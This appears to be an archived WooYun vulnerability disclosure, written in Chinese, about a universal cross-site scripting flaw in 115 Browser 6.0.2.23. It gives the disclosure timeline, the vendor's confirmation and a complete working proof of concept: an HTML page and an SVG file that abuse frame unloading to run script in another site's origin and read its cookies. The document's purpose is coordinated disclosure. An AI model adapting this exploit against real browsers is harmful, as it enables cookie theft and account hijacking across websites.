乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-02-13: 细节已通知厂商并且等待厂商处理中 2016-02-13: 厂商已经确认,细节仅向厂商公开 2016-02-16: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息) 2016-04-08: 细节向核心白帽子及相关领域专家公开 2016-04-18: 细节向普通白帽子公开 2016-04-28: 细节向实习白帽子公开 2016-05-13: 细节向公众公开
UXSS漏洞非跨域漏洞,可以在wooyun.org直接打baidu.com的Cookie,在目标域执行任意代码。版本:6.0.2.23
最新版:
利用代码:1.html
<body><iframe></iframe><table><b><p><iframe></iframe><script>frames[1].onunload = function() { document.body.removeChild(document.querySelector('table'));}onunload = function() { // Clean up to fix some crashes during reload. while (document.childNodes.length) { document.removeChild(document.childNodes[0]); }}onload = function() { try{ frames[0].a }catch(e){ location.reload() }; xof = frames[0].frameElement; xof.onload = function() { xof.onload = null; xof.src = 'javascript:alert(document.cookie)'; var xmlErr = document.documentElement.appendChild(document.createElement('iframe')); xmlErr.src = '1.svg'; } xof.src = 'http://**.**.**.**/';}</script></b></p></table></body>
1.svg
<svg xmlns="http://**.**.**.**/2000/svg"><script>document.documentElement.appendChild(document.createElementNS('http://**.**.**.**/1999/xhtml', 'iframe'));var b = top.xof.parentNode;if (t = b.childNodes[1]) { // It appears that something is holding the table element alive // because the node destructor didn't run and its siblings' refs // to it weren't cleared, so it's still reachable during node // traversals. That'd crash when insertedInto notifications try to // use the node's parentOrShadowHostNode(), so make sure it has // a parent, and use a spare document to avoid traversal loops. top.frames[1].document.body.appendChild(t);}frames[0].onunload = function() { document.documentElement.appendChild(b); b.insertBefore(document.createElement('x'), top.xof);}</script><element a="1" a="2" /></svg>
访问1.html即可执行在http://**.**.**.**/ 下执行 javascript:alert(document.cookie)
http://mhz.pw/game/chrome/1.html
危害等级:高
漏洞Rank:15
确认时间:2016-02-13 10:40
确认问题存在,感谢对115浏览器的支持!
暂无